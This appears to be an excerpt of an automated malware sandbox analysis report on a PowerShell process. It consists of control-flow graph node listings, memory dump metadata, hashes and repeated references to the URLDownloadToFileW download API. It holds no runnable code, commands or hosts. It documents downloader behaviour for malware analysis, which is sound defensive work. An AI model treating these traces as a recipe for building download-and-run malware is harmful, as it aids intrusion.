                                                                                                            execution_graph 10140 2b4763f 10141 2b475da 10140->10141 10143 2b4764b 10140->10143 10148 2b47c45 10141->10148 10156 2b47da8 10141->10156 10164 2b47a08 10141->10164 10173 2b47a18 10141->10173 10142 2b475df 10151 2b47b9a 10148->10151 10150 2b47ea8 10150->10142 10152 2b47d57 URLDownloadToFileW 10151->10152 10182 7214610 10151->10182 10193 72145ab 10151->10193 10204 72145f3 10151->10204 10152->10150 10157 2b47cf9 10156->10157 10161 7214610 6 API calls 10157->10161 10162 72145f3 6 API calls 10157->10162 10163 72145ab 6 API calls 10157->10163 10158 2b47d57 URLDownloadToFileW 10160 2b47ea8 10158->10160 10160->10142 10161->10158 10162->10158 10163->10158 10168 2b47a4c 10164->10168 10165 2b47b30 10165->10142 10167 2b47ea8 10167->10142 10168->10165 10169 2b47d57 URLDownloadToFileW 10168->10169 10170 7214610 6 API calls 10168->10170 10171 72145f3 6 API calls 10168->10171 10172 72145ab 6 API calls 10168->10172 10169->10167 10170->10169 10171->10169 10172->10169 10177 2b47a4c 10173->10177 10174 2b47b30 10174->10142 10176 2b47ea8 10176->10142 10177->10174 10178 2b47d57 URLDownloadToFileW 10177->10178 10179 7214610 6 API calls 10177->10179 10180 72145f3 6 API calls 10177->10180 10181 72145ab 6 API calls 10177->10181 10178->10176 10179->10178 10180->10178 10181->10178 10183 7214a93 10182->10183 10184 7214641 10182->10184 10183->10152 10184->10183 10186 2b47c45 7 API calls 10184->10186 10189 2b47a18 7 API calls 10184->10189 10190 2b47a08 7 API calls 10184->10190 10192 2b47da8 7 API calls 10184->10192 10215 2b41c18 10184->10215 10219 2b41bf2 10184->10219 10224 2b41ba1 10184->10224 10185 7214a34 10185->10152 10186->10185 10189->10185 10190->10185 10192->10185 10195 72145af 10193->10195 10194 72145c2 10194->10152 10195->10194 10197 2b47c45 7 API calls 10195->10197 10198 2b41ba1 URLDownloadToFileW 10195->10198 10199 2b41bf2 URLDownloadToFileW 10195->10199 10200 2b47a18 7 API calls 10195->10200 10201 2b47a08 7 API calls 10195->10201 10202 2b41c18 URLDownloadToFileW 10195->10202 10203 2b47da8 7 API calls 10195->10203 10196 7214a34 10196->10152 10197->10196 10198->10196 10199->10196 10200->10196 10201->10196 10202->10196 10203->10196 10206 72145f7 10204->10206 10205 7214a93 10205->10152 10206->10205 10208 2b47c45 7 API calls 10206->10208 10209 2b41ba1 URLDownloadToFileW 10206->10209 10210 2b41bf2 URLDownloadToFileW 10206->10210 10211 2b47a18 7 API calls 10206->10211 10212 2b47a08 7 API calls 10206->10212 10213 2b41c18 URLDownloadToFileW 10206->10213 10214 2b47da8 7 API calls 10206->10214 10207 7214a34 10207->10152 10208->10207 10209->10207 10210->10207 10211->10207 10212->10207 10213->10207 10214->10207 10216 2b41c1d URLDownloadToFileW 10215->10216 10218 2b47ea8 10216->10218 10218->10185 10221 2b41b9d 10219->10221 10220 2b41bc6 10220->10185 10221->10220 10222 2b47e71 URLDownloadToFileW 10221->10222 10223 2b47ea8 10222->10223 10223->10185 10225 2b41b9d 10224->10225 10225->10224 10226 2b47e71 URLDownloadToFileW 10225->10226 10227 2b41bc6 10225->10227 10228 2b47ea8 10226->10228 10227->10185 10228->10185

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 2b47a18-2b47a4a 1 2b47a90 0->1 2 2b47a4c-2b47a53 0->2 3 2b47a93-2b47acf 1->3 4 2b47a64 2->4 5 2b47a55-2b47a62 2->5 11 2b47ad5-2b47ade 3->11 12 2b47b58-2b47b63 3->12 6 2b47a66-2b47a68 4->6 5->6 9 2b47a6f-2b47a71 6->9 10 2b47a6a-2b47a6d 6->10 14 2b47a82 9->14 15 2b47a73-2b47a80 9->15 13 2b47a8e 10->13 11->12 18 2b47ae0-2b47ae6 11->18 16 2b47b65-2b47b68 12->16 17 2b47b72-2b47b94 12->17 13->3 19 2b47a84-2b47a86 14->19 15->19 16->17 27 2b47c5e-2b47d52 17->27 28 2b47b9a-2b47ba3 17->28 20 2b47aec-2b47af9 18->20 21 2b47de8-2b47e52 18->21 19->13 24 2b47b4f-2b47b56 20->24 25 2b47afb-2b47b2e 20->25 36 2b47e54-2b47e5a 21->36 37 2b47e5d-2b47e63 21->37 24->12 24->18 39 2b47b30-2b47b33 25->39 40 2b47b4b 25->40 75 2b47d55 call 7214610 27->75 76 2b47d55 call 72145f3 27->76 77 2b47d55 call 72145ab 27->77 28->21 30 2b47ba9-2b47be7 28->30 47 2b47c01-2b47c14 30->47 48 2b47be9-2b47bff 30->48 36->37 41 2b47e65-2b47e6e 37->41 42 2b47e71-2b47ea6 URLDownloadToFileW 37->42 44 2b47b35-2b47b38 39->44 45 2b47b3f-2b47b48 39->45 40->24 41->42 49 2b47eaf-2b47ec3 42->49 50 2b47ea8-2b47eae 42->50 44->45 51 2b47c16-2b47c1d 47->51 48->51 50->49 53 2b47c42 51->53 54 2b47c1f-2b47c30 51->54 53->27 54->53 58 2b47c32-2b47c3b 54->58 58->53 69 2b47d57-2b47d60 70 2b47d62-2b47d78 69->70 71 2b47d7a-2b47d8d 69->71 72 2b47d8f-2b47d96 70->72 71->72 73 2b47da5 72->73 74 2b47d98-2b47d9e 72->74 73->21 74->73 75->69 76->69 77->69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2201166912.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_2b40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c67c3f2cb780601700ed319e38b00e4d498532249cfeaaa9c4d06c54309e9afa
                                                                                                            • Instruction ID: f17d5f9fef6cd94aada478a04494b4dff02c12296ce0b1e33c88d31c682ee7a2
                                                                                                            • Opcode Fuzzy Hash: c67c3f2cb780601700ed319e38b00e4d498532249cfeaaa9c4d06c54309e9afa
                                                                                                            • Instruction Fuzzy Hash: 06E10A75A01219EFDB05DF98D984A9EFBB2FF88310F248159E815AB351CB31ED81DB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 78 2b41ba1-2b41ba4 79 2b41c04-2b41c07 78->79 80 2b41ba6-2b41bac 78->80 81 2b47e00-2b47e52 79->81 82 2b41c0c-2b41c13 80->82 83 2b41bae-2b41bb1 80->83 91 2b47e54-2b47e5a 81->91 92 2b47e5d-2b47e63 81->92 84 2b41c14-2b41c17 82->84 85 2b41bb3-2b41bb4 83->85 86 2b41b9d-2b41b9f 83->86 88 2b41c01-2b41c03 84->88 89 2b41c19-2b41c1c 84->89 85->84 90 2b41bb6-2b41bc4 85->90 86->78 88->79 97 2b41c7c-2b41c7e 89->97 98 2b41c1e-2b41c20 89->98 99 2b41c24-2b41c67 90->99 100 2b41bc6-2b41bce 90->100 91->92 95 2b47e65-2b47e6e 92->95 96 2b47e71-2b47ea6 URLDownloadToFileW 92->96 95->96 101 2b47eaf-2b47ec3 96->101 102 2b47ea8-2b47eae 96->102 97->81 98->99 99->97 102->101
                                                                                                            APIs
                                                                                                            • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 02B47E99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2201166912.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_2b40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DownloadFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1407266417-0
                                                                                                            • Opcode ID: 3ee8f9444b5e65a6800b52a50974372047370d09ea0233f9753b7e758727552e
                                                                                                            • Instruction ID: 4126916c1c2ef56f44cb2e16259b6e2fec145472dbe4412e0d003cff0e4cdea6
                                                                                                            • Opcode Fuzzy Hash: 3ee8f9444b5e65a6800b52a50974372047370d09ea0233f9753b7e758727552e
                                                                                                            • Instruction Fuzzy Hash: 3341E1B2C097899FCB01CFACD8846DEBFB4FB4A300F14819AD458AB212C7349944DBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 105 7211f40-7211f65 106 7212158-721217c 105->106 107 7211f6b-7211f70 105->107 117 72121de-72121df 106->117 118 721217e-72121a2 106->118 108 7211f72-7211f78 107->108 109 7211f88-7211f8c 107->109 110 7211f7a 108->110 111 7211f7c-7211f86 108->111 112 7211f92-7211f94 109->112 113 7212108-7212112 109->113 110->109 111->109 115 7211fa4 112->115 116 7211f96-7211fa2 112->116 119 7212120-7212126 113->119 120 7212114-721211d 113->120 125 7211fa6-7211fa8 115->125 116->125 124 72121e3-72121e5 117->124 126 7212326-721236a 118->126 127 72121a8-72121ad 118->127 121 7212128-721212a 119->121 122 721212c-7212138 119->122 128 721213a-7212155 121->128 122->128 129 72122d8-72122e2 124->129 130 72121eb-721220a 124->130 125->113 131 7211fae-7211fcd 125->131 141 7212480-72124b5 126->141 142 7212370-7212375 126->142 132 72121c5-72121c9 127->132 133 72121af-72121b5 127->133 139 72122e4-72122ec 129->139 140 72122ef-72122f5 129->140 172 721221a 130->172 173 721220c-7212218 130->173 163 7211fdd 131->163 164 7211fcf-7211fdb 131->164 132->129 138 72121cf-72121d1 132->138 134 72121b7 133->134 135 72121b9-72121c3 133->135 134->132 135->132 143 72121e1 138->143 144 72121d3-72121dc 138->144 146 72122f7-72122f9 140->146 147 72122fb-7212307 140->147 167 72124e3-72124ed 141->167 168 72124b7-72124d9 141->168 151 7212377-721237d 142->151 152 721238d-7212391 142->152 143->124 144->117 153 7212309-7212323 146->153 147->153 154 7212381-721238b 151->154 155 721237f 151->155 157 7212432-721243c 152->157 158 7212397-7212399 152->158 154->152 155->152 169 7212449-721244f 157->169 170 721243e-7212446 157->170 165 72123a9 158->165 166 721239b-72123a7 158->166 175 7211fdf-7211fe1 163->175 164->175 181 72123ab-72123ad 165->181 166->181 178 72124f7-72124fd 167->178 179 72124ef-72124f4 167->179 205 72124db-72124e0 168->205 206 721252d-7212556 168->206 176 7212451-7212453 169->176 177 7212455-7212461 169->177 174 721221c-721221e 172->174 173->174 174->129 184 7212224-721225b 174->184 175->113 185 7211fe7-7211fee 175->185 186 7212463-721247d 176->186 177->186 187 7212503-721250f 178->187 188 72124ff-7212501 178->188 181->157 182 72123b3-72123b5 181->182 190 72123b7-72123bd 182->190 191 72123cf-72123d6 182->191 224 7212275-721227c 184->224 225 721225d-7212263 184->225 185->106 192 7211ff4-7211ff9 185->192 194 7212511-721252a 187->194 188->194 196 72123c1-72123cd 190->196 197 72123bf 190->197 201 72123d8-72123de 191->201 202 72123ee-721242f 191->202 199 7212011-7212020 192->199 200 7211ffb-7212001 192->200 196->191 197->191 199->113 219 7212026-7212044 199->219 207 7212003 200->207 208 7212005-721200f 200->208 209 72123e0 201->209 210 72123e2-72123ec 201->210 227 7212585-721258d 206->227 228 7212558-721257e 206->228 207->199 208->199 209->202 210->202 219->113 240 721204a-721206f 219->240 231 7212294-72122d5 224->231 232 721227e-7212284 224->232 229 7212265 225->229 230 7212267-7212273 225->230 242 7212599-72125b4 227->242 243 721258f-7212595 227->243 228->227 229->224 230->224 233 7212286 232->233 234 7212288-7212292 232->234 233->231 234->231 240->113 256 7212075-721207c 240->256 246 72125b6-72125d3 242->246 247 72125ed-72125f7 242->247 243->242 254 72125d5-72125e7 246->254 255 721263d-7212642 246->255 248 7212600-7212606 247->248 249 72125f9-72125fd 247->249 252 7212608-721260a 248->252 253 721260c-7212618 248->253 257 721261a-721263a 252->257 253->257 254->247 255->254 258 72120c2-72120f5 256->258 259 721207e-7212099 256->259 274 72120fc-7212105 258->274 265 72120b3-72120b7 259->265 266 721209b-72120a1 259->266 271 72120be-72120c0 265->271 269 72120a3 266->269 270 72120a5-72120b1 266->270 269->265 270->265 271->274
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 32c7b97f31a0d2d1e4009f805c51b2aae4f5aa2b4d1e7e24668da961dd4b6a6c
                                                                                                            • Instruction ID: 1ad398bcc1b53b0d58b21d8cbe61d1f8395dd81975460283964a9f6e6fbad736
                                                                                                            • Opcode Fuzzy Hash: 32c7b97f31a0d2d1e4009f805c51b2aae4f5aa2b4d1e7e24668da961dd4b6a6c
                                                                                                            • Instruction Fuzzy Hash: EA123CB1714307DFDB158B68C81076BBBE2BFE6211F1480BAE945DB291DB72C842C7A1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 278 7214610-721463b 279 7214641-7214646 278->279 280 7214af2-7214b25 278->280 281 7214648-721464e 279->281 282 721465e-7214663 279->282 288 7214b35 280->288 289 7214b27-7214b33 280->289 283 7214650 281->283 284 7214652-721465c 281->284 286 7214673 282->286 287 7214665-7214671 282->287 283->282 284->282 290 7214675-7214677 286->290 287->290 292 7214b37-7214b39 288->292 289->292 293 7214a93-7214a9d 290->293 294 721467d-7214687 290->294 297 7214b7b-7214b85 292->297 298 7214b3b-7214b42 292->298 295 7214aab-7214ab1 293->295 296 7214a9f-7214aa8 293->296 294->280 299 721468d-7214692 294->299 300 7214ab3-7214ab5 295->300 301 7214ab7-7214ac3 295->301 305 7214b87-7214b8b 297->305 306 7214b8e-7214b94 297->306 298->297 302 7214b44-7214b61 298->302 303 7214694-721469a 299->303 304 72146aa-72146b8 299->304 309 7214ac5-7214aef 300->309 301->309 318 7214b63-7214b75 302->318 319 7214bc9-7214bce 302->319 310 721469c 303->310 311 721469e-72146a8 303->311 304->293 316 72146be-72146dd 304->316 307 7214b96-7214b98 306->307 308 7214b9a-7214ba6 306->308 313 7214ba8-7214bc6 307->313 308->313 310->304 311->304 316->293 328 72146e3-72146ed 316->328 318->297 319->318 328->280 329 72146f3-72146f8 328->329 330 7214710-7214714 329->330 331 72146fa-7214700 329->331 330->293 334 721471a-721471e 330->334 332 7214702 331->332 333 7214704-721470e 331->333 332->330 333->330 334->293 335 7214724-7214728 334->335 335->293 336 721472e-721473e 335->336 338 7214744-721476b 336->338 339 72147c6-7214815 336->339 344 7214785-72147b3 338->344 345 721476d-7214773 338->345 356 721481c-721482f 339->356 353 72147c1-72147c4 344->353 354 72147b5-72147b7 344->354 346 7214775 345->346 347 7214777-7214783 345->347 346->344 347->344 353->356 354->353 357 7214835-721485c 356->357 358 72148b7-7214906 356->358 363 7214876-72148a4 357->363 364 721485e-7214864 357->364 375 721490d-7214920 358->375 372 72148b2-72148b5 363->372 373 72148a6-72148a8 363->373 365 7214866 364->365 366 7214868-7214874 364->366 365->363 366->363 372->375 373->372 376 7214926-721494d 375->376 377 72149a8-72149f7 375->377 382 7214967-7214995 376->382 383 721494f-7214955 376->383 394 72149fe-7214a2c 377->394 392 72149a3-72149a6 382->392 393 7214997-7214999 382->393 384 7214957 383->384 385 7214959-7214965 383->385 384->382 385->382 392->394 393->392 399 7214a2f call 2b47c45 394->399 400 7214a2f call 2b41ba1 394->400 401 7214a2f call 2b41bf2 394->401 402 7214a2f call 2b47a18 394->402 403 7214a2f call 2b47a08 394->403 404 7214a2f call 2b41c18 394->404 405 7214a2f call 2b47da8 394->405 397 7214a34-7214a90 399->397 400->397 401->397 402->397 403->397 404->397 405->397
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ef39a2e8cfefe8722ab30cca7e852b2a11536677770a2631cf2c44e28c8c496
                                                                                                            • Instruction ID: c9f9f6503287bac0d15bc2cb6dc66630a05470387ad11f722ef4611384543e18
                                                                                                            • Opcode Fuzzy Hash: 5ef39a2e8cfefe8722ab30cca7e852b2a11536677770a2631cf2c44e28c8c496
                                                                                                            • Instruction Fuzzy Hash: 23F116B1B102469FDB14AF68C410B6ABBF2FBD9710F258469E9099B340DB72DD41CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 548 72145f3-72145f5 549 7214601-721463b 548->549 550 72145f7-7214600 548->550 552 7214641-7214646 549->552 553 7214af2-7214b25 549->553 550->549 554 7214648-721464e 552->554 555 721465e-7214663 552->555 561 7214b35 553->561 562 7214b27-7214b33 553->562 556 7214650 554->556 557 7214652-721465c 554->557 559 7214673 555->559 560 7214665-7214671 555->560 556->555 557->555 563 7214675-7214677 559->563 560->563 565 7214b37-7214b39 561->565 562->565 566 7214a93-7214a9d 563->566 567 721467d-7214687 563->567 570 7214b7b-7214b85 565->570 571 7214b3b-7214b42 565->571 568 7214aab-7214ab1 566->568 569 7214a9f-7214aa8 566->569 567->553 572 721468d-7214692 567->572 573 7214ab3-7214ab5 568->573 574 7214ab7-7214ac3 568->574 578 7214b87-7214b8b 570->578 579 7214b8e-7214b94 570->579 571->570 575 7214b44-7214b61 571->575 576 7214694-721469a 572->576 577 72146aa-72146b8 572->577 582 7214ac5-7214aef 573->582 574->582 591 7214b63-7214b75 575->591 592 7214bc9-7214bce 575->592 583 721469c 576->583 584 721469e-72146a8 576->584 577->566 589 72146be-72146dd 577->589 580 7214b96-7214b98 579->580 581 7214b9a-7214ba6 579->581 586 7214ba8-7214bc6 580->586 581->586 583->577 584->577 589->566 601 72146e3-72146ed 589->601 591->570 592->591 601->553 602 72146f3-72146f8 601->602 603 7214710-7214714 602->603 604 72146fa-7214700 602->604 603->566 607 721471a-721471e 603->607 605 7214702 604->605 606 7214704-721470e 604->606 605->603 606->603 607->566 608 7214724-7214728 607->608 608->566 609 721472e-721473e 608->609 611 7214744-721476b 609->611 612 72147c6-7214815 609->612 617 7214785-72147b3 611->617 618 721476d-7214773 611->618 629 721481c-721482f 612->629 626 72147c1-72147c4 617->626 627 72147b5-72147b7 617->627 619 7214775 618->619 620 7214777-7214783 618->620 619->617 620->617 626->629 627->626 630 7214835-721485c 629->630 631 72148b7-7214906 629->631 636 7214876-72148a4 630->636 637 721485e-7214864 630->637 648 721490d-7214920 631->648 645 72148b2-72148b5 636->645 646 72148a6-72148a8 636->646 638 7214866 637->638 639 7214868-7214874 637->639 638->636 639->636 645->648 646->645 649 7214926-721494d 648->649 650 72149a8-72149f7 648->650 655 7214967-7214995 649->655 656 721494f-7214955 649->656 667 72149fe-7214a2c 650->667 665 72149a3-72149a6 655->665 666 7214997-7214999 655->666 657 7214957 656->657 658 7214959-7214965 656->658 657->655 658->655 665->667 666->665 672 7214a2f call 2b47c45 667->672 673 7214a2f call 2b41ba1 667->673 674 7214a2f call 2b41bf2 667->674 675 7214a2f call 2b47a18 667->675 676 7214a2f call 2b47a08 667->676 677 7214a2f call 2b41c18 667->677 678 7214a2f call 2b47da8 667->678 670 7214a34-7214a90 672->670 673->670 674->670 675->670 676->670 677->670 678->670
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a37e3173424c25f2b2f3b537b152b17ad6ebf3dd9b5096a456a87c053d38ca2b
                                                                                                            • Instruction ID: c72f7a841b1489b80eb57044e321fecf45bf6a4003229c6a57e545e353c6951e
                                                                                                            • Opcode Fuzzy Hash: a37e3173424c25f2b2f3b537b152b17ad6ebf3dd9b5096a456a87c053d38ca2b
                                                                                                            • Instruction Fuzzy Hash: 6F91F5F0B202869FCB14EF54C450B69B7F2FB99710F258169E909AB344DB72ED41CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 679 72145ab-72145ad 680 72145b9-72145c0 679->680 681 72145af-72145b3 679->681 682 72145c2-72145d1 680->682 683 7214639-721463b 680->683 681->680 684 72145d3-72145d5 682->684 685 72145df-72145f0 682->685 686 7214641-7214646 683->686 687 7214af2-7214b25 683->687 684->685 688 7214648-721464e 686->688 689 721465e-7214663 686->689 696 7214b35 687->696 697 7214b27-7214b33 687->697 690 7214650 688->690 691 7214652-721465c 688->691 693 7214673 689->693 694 7214665-7214671 689->694 690->689 691->689 698 7214675-7214677 693->698 694->698 700 7214b37-7214b39 696->700 697->700 701 7214a93-7214a9d 698->701 702 721467d-7214687 698->702 705 7214b7b-7214b85 700->705 706 7214b3b-7214b42 700->706 703 7214aab-7214ab1 701->703 704 7214a9f-7214aa8 701->704 702->687 707 721468d-7214692 702->707 708 7214ab3-7214ab5 703->708 709 7214ab7-7214ac3 703->709 713 7214b87-7214b8b 705->713 714 7214b8e-7214b94 705->714 706->705 710 7214b44-7214b61 706->710 711 7214694-721469a 707->711 712 72146aa-72146b8 707->712 717 7214ac5-7214aef 708->717 709->717 726 7214b63-7214b75 710->726 727 7214bc9-7214bce 710->727 718 721469c 711->718 719 721469e-72146a8 711->719 712->701 724 72146be-72146dd 712->724 715 7214b96-7214b98 714->715 716 7214b9a-7214ba6 714->716 721 7214ba8-7214bc6 715->721 716->721 718->712 719->712 724->701 736 72146e3-72146ed 724->736 726->705 727->726 736->687 737 72146f3-72146f8 736->737 738 7214710-7214714 737->738 739 72146fa-7214700 737->739 738->701 742 721471a-721471e 738->742 740 7214702 739->740 741 7214704-721470e 739->741 740->738 741->738 742->701 743 7214724-7214728 742->743 743->701 744 721472e-721473e 743->744 746 7214744-721476b 744->746 747 72147c6-7214815 744->747 752 7214785-72147b3 746->752 753 721476d-7214773 746->753 764 721481c-721482f 747->764 761 72147c1-72147c4 752->761 762 72147b5-72147b7 752->762 754 7214775 753->754 755 7214777-7214783 753->755 754->752 755->752 761->764 762->761 765 7214835-721485c 764->765 766 72148b7-7214906 764->766 771 7214876-72148a4 765->771 772 721485e-7214864 765->772 783 721490d-7214920 766->783 780 72148b2-72148b5 771->780 781 72148a6-72148a8 771->781 773 7214866 772->773 774 7214868-7214874 772->774 773->771 774->771 780->783 781->780 784 7214926-721494d 783->784 785 72149a8-72149f7 783->785 790 7214967-7214995 784->790 791 721494f-7214955 784->791 802 72149fe-7214a2c 785->802 800 72149a3-72149a6 790->800 801 7214997-7214999 790->801 792 7214957 791->792 793 7214959-7214965 791->793 792->790 793->790 800->802 801->800 807 7214a2f call 2b47c45 802->807 808 7214a2f call 2b41ba1 802->808 809 7214a2f call 2b41bf2 802->809 810 7214a2f call 2b47a18 802->810 811 7214a2f call 2b47a08 802->811 812 7214a2f call 2b41c18 802->812 813 7214a2f call 2b47da8 802->813 805 7214a34-7214a90 807->805 808->805 809->805 810->805 811->805 812->805 813->805
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 50cb59ea0af56ab5f8c9b5447640342fc8e3cccb4667b86d117559b09a094c5c
                                                                                                            • Instruction ID: ed0a2ad3edaf8cc91f40368c1cea9ace7043ad34c6e89bf7b2093f67a18d30bb
                                                                                                            • Opcode Fuzzy Hash: 50cb59ea0af56ab5f8c9b5447640342fc8e3cccb4667b86d117559b09a094c5c
                                                                                                            • Instruction Fuzzy Hash: 3291F6F0B202869FCB18AF58C450B69B7F2FB95710F258569D919AF344CB72EC41CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 908 7211f26-7211f65 909 7212158-721217c 908->909 910 7211f6b-7211f70 908->910 920 72121de-72121df 909->920 921 721217e-72121a2 909->921 911 7211f72-7211f78 910->911 912 7211f88-7211f8c 910->912 913 7211f7a 911->913 914 7211f7c-7211f86 911->914 915 7211f92-7211f94 912->915 916 7212108-7212112 912->916 913->912 914->912 918 7211fa4 915->918 919 7211f96-7211fa2 915->919 922 7212120-7212126 916->922 923 7212114-721211d 916->923 928 7211fa6-7211fa8 918->928 919->928 927 72121e3-72121e5 920->927 929 7212326-721236a 921->929 930 72121a8-72121ad 921->930 924 7212128-721212a 922->924 925 721212c-7212138 922->925 931 721213a-7212155 924->931 925->931 932 72122d8-72122e2 927->932 933 72121eb-721220a 927->933 928->916 934 7211fae-7211fcd 928->934 944 7212480-72124b5 929->944 945 7212370-7212375 929->945 935 72121c5-72121c9 930->935 936 72121af-72121b5 930->936 942 72122e4-72122ec 932->942 943 72122ef-72122f5 932->943 975 721221a 933->975 976 721220c-7212218 933->976 966 7211fdd 934->966 967 7211fcf-7211fdb 934->967 935->932 941 72121cf-72121d1 935->941 937 72121b7 936->937 938 72121b9-72121c3 936->938 937->935 938->935 946 72121e1 941->946 947 72121d3-72121dc 941->947 949 72122f7-72122f9 943->949 950 72122fb-7212307 943->950 970 72124e3-72124ed 944->970 971 72124b7-72124d9 944->971 954 7212377-721237d 945->954 955 721238d-7212391 945->955 946->927 947->920 956 7212309-7212323 949->956 950->956 957 7212381-721238b 954->957 958 721237f 954->958 960 7212432-721243c 955->960 961 7212397-7212399 955->961 957->955 958->955 972 7212449-721244f 960->972 973 721243e-7212446 960->973 968 72123a9 961->968 969 721239b-72123a7 961->969 978 7211fdf-7211fe1 966->978 967->978 984 72123ab-72123ad 968->984 969->984 981 72124f7-72124fd 970->981 982 72124ef-72124f4 970->982 1008 72124db-72124e0 971->1008 1009 721252d-7212556 971->1009 979 7212451-7212453 972->979 980 7212455-7212461 972->980 977 721221c-721221e 975->977 976->977 977->932 987 7212224-721225b 977->987 978->916 988 7211fe7-7211fee 978->988 989 7212463-721247d 979->989 980->989 990 7212503-721250f 981->990 991 72124ff-7212501 981->991 984->960 985 72123b3-72123b5 984->985 993 72123b7-72123bd 985->993 994 72123cf-72123d6 985->994 1027 7212275-721227c 987->1027 1028 721225d-7212263 987->1028 988->909 995 7211ff4-7211ff9 988->995 997 7212511-721252a 990->997 991->997 999 72123c1-72123cd 993->999 1000 72123bf 993->1000 1004 72123d8-72123de 994->1004 1005 72123ee-721242f 994->1005 1002 7212011-7212020 995->1002 1003 7211ffb-7212001 995->1003 999->994 1000->994 1002->916 1022 7212026-7212044 1002->1022 1010 7212003 1003->1010 1011 7212005-721200f 1003->1011 1012 72123e0 1004->1012 1013 72123e2-72123ec 1004->1013 1030 7212585-721258d 1009->1030 1031 7212558-721257e 1009->1031 1010->1002 1011->1002 1012->1005 1013->1005 1022->916 1043 721204a-721206f 1022->1043 1034 7212294-72122d5 1027->1034 1035 721227e-7212284 1027->1035 1032 7212265 1028->1032 1033 7212267-7212273 1028->1033 1045 7212599-72125b4 1030->1045 1046 721258f-7212595 1030->1046 1031->1030 1032->1027 1033->1027 1036 7212286 1035->1036 1037 7212288-7212292 1035->1037 1036->1034 1037->1034 1043->916 1059 7212075-721207c 1043->1059 1049 72125b6-72125d3 1045->1049 1050 72125ed-72125f7 1045->1050 1046->1045 1057 72125d5-72125e7 1049->1057 1058 721263d-7212642 1049->1058 1051 7212600-7212606 1050->1051 1052 72125f9-72125fd 1050->1052 1055 7212608-721260a 1051->1055 1056 721260c-7212618 1051->1056 1060 721261a-721263a 1055->1060 1056->1060 1057->1050 1058->1057 1061 72120c2-72120f5 1059->1061 1062 721207e-7212099 1059->1062 1077 72120fc-7212105 1061->1077 1068 72120b3-72120b7 1062->1068 1069 721209b-72120a1 1062->1069 1074 72120be-72120c0 1068->1074 1072 72120a3 1069->1072 1073 72120a5-72120b1 1069->1073 1072->1068 1073->1068 1074->1077
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 750f32b250876718afe715aa9b22ebb8f56e3e45cea27256b3e736aa01cc8894
                                                                                                            • Instruction ID: 6e13665d6218ba086cd42cd5f52d8ac8b15b85dc9c28c1664d408880e9d292e3
                                                                                                            • Opcode Fuzzy Hash: 750f32b250876718afe715aa9b22ebb8f56e3e45cea27256b3e736aa01cc8894
                                                                                                            • Instruction Fuzzy Hash: 1E41C7F0B24307DFCB20CF14894076A7BE2BFA5211B5681A5EB04EB292D736D985CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
